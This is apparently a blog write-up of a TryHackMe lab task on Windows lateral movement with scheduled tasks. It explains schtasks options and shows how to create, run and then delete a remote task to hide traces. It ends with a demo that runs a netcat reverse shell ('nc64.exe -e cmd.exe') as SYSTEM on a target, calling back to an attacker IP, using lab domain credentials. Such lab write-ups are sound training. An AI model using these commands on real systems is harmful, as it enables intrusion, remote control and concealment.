Common windows feature abused by threat actors to move laterally and keep persistence is scheduled tasks. Threat actors love this as it's available on any windows installation.
note:
Thanks mura
This blog post will demonstrate this method using the Lateral Movement and Pivoting room provided by TryHackMe Task 4.
How to create a scheduled task on a remote host
schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<payload>" /sc ONCE /sd 01/01/1970 /st 00:00
Command break down:
/s = specify the host we wish remotely issue the command too
/RU = Run task with specified user privilege (Defaults to current user account)
/create = creating the task
/tn = task name "mytask"
/tr = Task run (command to execute)
/sc = Frequency of task Minute, hourly, Daily.. etc
/sd = Start date, the date to execute the task
/st = start time, time of execution
/u = domain username
/p = password, if left blank will be prompted
As we can execute scheduled tasks manually the /sd and /st parameters are not so important in this scenario.
Manual task execution
schtasks /s TARGET /run /TN "THMtask1"
like a good threat actor we want to make sure to clean up after ourselves by deleting the task:
schtasks /S TARGET /TN "THMtask1" /DELETE /F
Demo TIME
Let's start by creating our payload using msfvenom
After creating our payload we need some way to get it onto the host, In this scenario I have a set of credentials where I can access a smbshare to upload my reverse shell too
Now that the reverse shell has successfully uploaded I need to now create my task, as we are creating a task on a privileged user I will need to specify the credentials (please ignore the formatting tryhackme attack box sucks)
schtasks /s 10.200.51.201 /RU "SYSTEM" /create /tn "THMtask69" /tr "<c:\tools\nc64.exe -e cmd.exe 10.50.49.81 4443>" /sc ONCE /sd 01/01/1925 /st 00:00 /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever
schtasks /s 10.200.51.201 /run /TN "THMtask69" /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever